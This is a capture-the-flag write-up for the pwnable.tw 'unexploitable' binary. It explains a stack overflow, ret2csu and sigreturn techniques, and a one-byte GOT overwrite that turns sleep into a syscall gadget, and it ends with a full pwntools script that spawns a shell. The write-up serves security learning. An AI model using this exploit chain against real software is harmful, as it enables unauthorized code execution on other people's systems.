unexploitable [500 pts]

The original challenge is on pwnable.kr and it is solvable.

This time we fix the vulnerability and now we promise that the service is unexploitable.

nc chall.pwnable.tw 10403

unexploitable libc.so

Initial Analysis

By running checksec, we can view the protections and memory corruption mitigations enabled on this binary.

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

As we can see, the only protection enable is NX, which means the stack is non executable.

Let’s decompile the binary and take a look at it’s insides.

main

The binary is very simple, it will simply sleep for 3 seconds then read 256 bytes into a 16 byte buffer. The vulnerability is an obvious buffer overflow, and without a stack canary we can hijack program control without any leaks.

As this is a 500 point challenge, the binary seemed deceptively simple. First and foremost, we aren’t given a lot to work with here. At a first glance, there doesnt seem to be any way in which we can spawn a shell given such little to work with.

Exploitation

There are two solutions that I found to this challenge, each revolving around a similar concept. We need some means of controlling the current execution context, particularly the registers in order to gain the ability to spawn a shell via execve().

The first solution involves the technique ret2csu, in which we utilize the gadgets present in __libc_csu_init() to gain control of the necessary registers to spawn a shell. Keep in mind that this technique no longer works in newer versions of glibc due to the fact that the function was moved into libc in glibc 2.34 under the symbol call_init. This patch removed the gadgets from the binary which were required to perform this technique.

The second solution utilizes sigreturn oriented programming; which exploits the signal handling mechanism to forge a fake signal frame. This signal frame stores the execution context of the running process which was stored on the user space stack in order to execute the signal handler. A more in-depth explanation of the technique is detailed within the sigreturn oriented programming post.

Our next problem is the fact that we dont have a syscall gadget, nor do we have any obvious means of controlling the rax register to contain our desired value of 59 (execve).

In the x86_64 ABI, the ax register (and its extended forms) serves multiple use cases. One of those being the fact that it contains the return value for each executed routine. If we can hijack program control, then we can populate the rax register with whatever value we want simply by manipulating this functionality.

The following is a snippet from the man page for the read system call.

RETURN VALUE
  Upon successful completion, these functions shall return a non-negative
  integer indicating the number of bytes actually read. Otherwise, the
  functions shall return -1 and set errno to indicate the error.

By leveraging the read import, we can gain control of the rax register.

We also need a reference to whichever binary we want to execute, which in this case is /bin/sh\x00. This can be achieved simply by reading the string into a writeable section of memory and passing that reference to execve.

Our last problem is that of the syscall gadget, as one isn’t present within the binary.

However, something that we can notice is the fact that Full RELRO is not enabled, which means the global offset table is writeable. Despite ASLR being enabled, memory pages are always aligned to 0x1000; meaning that the three least significant nibbles will always be fixed.

Due to the fact that the addresses of various imported symbols are populated dynamically at runtime lazily, we can overwrite an entry within the GOT to point to whatever instruction relative to the symbol in libc. Let’s take a look at the surrounding instructions in the libc provided to us and see if we can find a syscall instruction. I chose to use the sleep import to overwrite.

To do so, we can search all the instructions in which we can reliably overwrite, first we find the address of sleep within libc.

[0x000cb680]> pd 1 @sym.sleep
            ; CALL XREF from sym.argp_error @ +0x205(x)
            ; CALL XREF from sym.rcmd_af @ 0x11d49b(x)
            ; CALL XREF from sym.rexec_af @ 0x11e124(x)
┌ 68: int sym.sleep (int s);
│ rg: 1 (vars 0, args 1)
│ bp: 0 (vars 0, args 0)
│ sp: 1 (vars 1, args 0)
│           0x000cb680      55             push rbp
[0x000cb680]>

So we now know that we can reliably overwrite to any instruction within the range 0x000cb000-0x000cbfff. By searching for instructions within this range, I chose the syscall gadget at the address 0x000cb655. So by overwriting the least significant byte of the sleep GOT entry with \x55, we effectively gain the ability to invoke system calls.

Keep in mind, when debugging this locally if you are not loading the binary with the provided libc you will have to update the offset to point to syscall for whichever libc you are using.

I chose to use the ret2csu technique, the full exploit code is provided down below.

#!/usr/bin/env python3
from pwn import *
from sys import argv
from time import sleep

binary = ELF('unexploitable', checksec=0)
libc = ELF('libc_64.so.6', checksec=0)
context.arch='amd64'
context.log_level='DEBUG'
r=False
if len(argv) >= 2 and argv[1] == '-r':
  r=True
  p = remote('chall.pwnable.tw', 10403)
else:
  p = binary.process(env={})
s = lambda x, r="" : \
  p.sendafter(r, x) if r else p.send(x)
sl = lambda x, r="" : \
  p.sendlineafter(r, x) if r else p.sendline(x)

csu_gadget_1 = 0x004005e6
csu_gadget_2 = 0x004005d0
csu_chain = lambda f, a1=0, a2=0, a3=0 : \
  flat(csu_gadget_1, 0, 0, 1, f, a1, a2, a3, csu_gadget_2) + p64(0)*7

offset=24
bss_section=0x00601028

pause()

payload = b'A'*offset           # overwrite base pointer
payload += csu_chain(binary.got['read'], 0, bss_section, 1024)
payload += p64(0x0000000000400512) # pop rbp ; ret
payload += p64(bss_section)
payload += p64(0x0000000000400576) # leave ; ret

log.info("sleep(3)")
sleep(3)
log.info("Sending payload 1")

p.send(payload)

payload2 = b'/bin/sh\x00' # overwrite base with bin sh string
payload2 += csu_chain(binary.got['read'], 0, binary.got['sleep'], 1)
payload2 += csu_chain(binary.got['sleep'], 1, bss_section, 59)
payload2 += csu_chain(binary.got['sleep'], bss_section, 0, 0)

p.send(payload2)
sleep(1)
p.sendline(b'\x55' if r else b'\xb9')
p.interactive()

Conclusion

Something to keep in mind is the fact that the initial read within main only allows us to read 0x100 bytes into the local buffer. In my case in using ret2csu it was very easy to craft rop chains which are larger than this read. We can circumvent this with a stack pivot to any read/write region of known memory; I chose to use the .bss section.

Thanks for reading ＼(≧▽≦)／ !!